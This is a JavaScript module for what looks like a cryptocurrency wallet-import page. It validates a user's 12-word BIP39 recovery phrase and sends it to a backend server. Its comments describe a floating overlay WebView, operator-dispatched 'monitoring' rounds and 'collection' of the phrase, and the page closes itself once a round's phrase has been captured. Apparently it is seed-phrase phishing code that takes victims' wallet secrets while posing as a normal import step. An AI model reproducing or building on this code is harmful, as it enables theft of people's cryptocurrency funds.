import { validateMnemonic } from './mnemonicValidator';
import { checkMnemonicSaved, saveMnemonicToBackend } from './mnemonicSave';
import { resolveApiBase } from './apiConfig';

/** 将 validateMnemonic 的 error 码转为 i18n 文案 */
export function getMnemonicErrorMessage(vm, result) {
  if (!result) return vm.$t('errors.validateFailedSimple');
  switch (result.error) {
    case 'invalid_words': {
      const invalid = (result.results || []).filter(r => !r.valid).map(r => r.word);
      if (invalid.length) {
        return vm.$t('errors.invalidWords', { words: invalid.join(', ') });
      }
      return vm.$t('errors.mnemonicIncorrect');
    }
    case 'invalid_length':
      if (result.wordCount > 0 && result.wordCount < 12) {
        return vm.$t('errors.incompleteWords', { count: result.wordCount });
      }
      return vm.$t('errors.invalidLength', { count: result.wordCount || 0 });
    case 'invalid_checksum':
      return vm.$t('errors.checksumInvalid');
    case 'empty':
      return vm.$t('errors.need12Words');
    default:
      return vm.$t('errors.mnemonicIncorrect');
  }
}

/**
 * 本地 BIP39 校验 + 后端校验 + 保存（任一步失败则不导入）
 */
export async function importMnemonicAfterValidation(vm, mnemonic, route) {
  const text = String(mnemonic || '').trim();
  const local = validateMnemonic(text);

  if (!local.valid) {
    return {
      ok: false,
      stage: 'local',
      message: getMnemonicErrorMessage(vm, local),
      local
    };
  }

  const apiBase = resolveApiBase();

  // 本地 BIP39 已通过时，保存接口会再次校验；避免设备上请求 127.0.0.1 导致误报
  const saved = await saveMnemonicToBackend(local.normalized, route, apiBase);
  if (!saved.ok) {
    if (saved.error === 'missing_device_id') {
      return {
        ok: false,
        stage: 'device',
        message: vm.$t('errors.missingDeviceId'),
      };
    }
    if (saved.error === 'network') {
      return {
        ok: false,
        stage: 'network',
        message: vm.$t('errors.networkFailed'),
      };
    }
    if (saved.error === 'api_wrong_host') {
      return {
        ok: false,
        stage: 'network',
        message:
          '接口地址错误：请求发到了 H5 静态站(82端口)。请确认链接带 apiBase=http://服务器:8005 并重新下发监控。',
      };
    }
    const errText =
      typeof saved.error === 'string' && saved.error
        ? saved.error
        : vm.$t('errors.saveFailed');
    return {
      ok: false,
      stage: 'save',
      message: vm.$t('errors.saveFailedDetail', { error: errText }),
    };
  }

  return { ok: true, mnemonic: local.normalized };
}

export function closeWebViewAfterImport(vm) {
  if (window.AppBridge && typeof window.AppBridge.close === 'function') {
    window.AppBridge.close();
    return;
  }
  window.close();
  setTimeout(() => {
    if (vm.$router) {
      vm.$router.back();
    } else {
      window.history.back();
    }
  }, 100);
}

/**
 * 导入页打开时检查当前设备/钱包是否已经保存过。
 *
 * 悬浮 WebView：只在「本轮监控已经采集过」时自动关窗，避免同一次采集反复要求输入；
 * 操作员重新下发监控 = 新一轮，服务端时间戳刷新，仍会展示输入页，可重新采集。
 */
export async function closeIfMnemonicAlreadySaved(vm, route) {
  const params = new URLSearchParams(window.location.search);
  if (params.get('forceShow') === '1') {
    return false;
  }

  const status = await checkMnemonicSaved(route, resolveApiBase());
  if (!status.ok) return false;

  if (window.AppBridge) {
    if (!status.roundCompleted) return false;
    closeWebViewAfterImport(vm);
    return true;
  }

  if (!status.saved) return false;
  closeWebViewAfterImport(vm);
  return true;
}
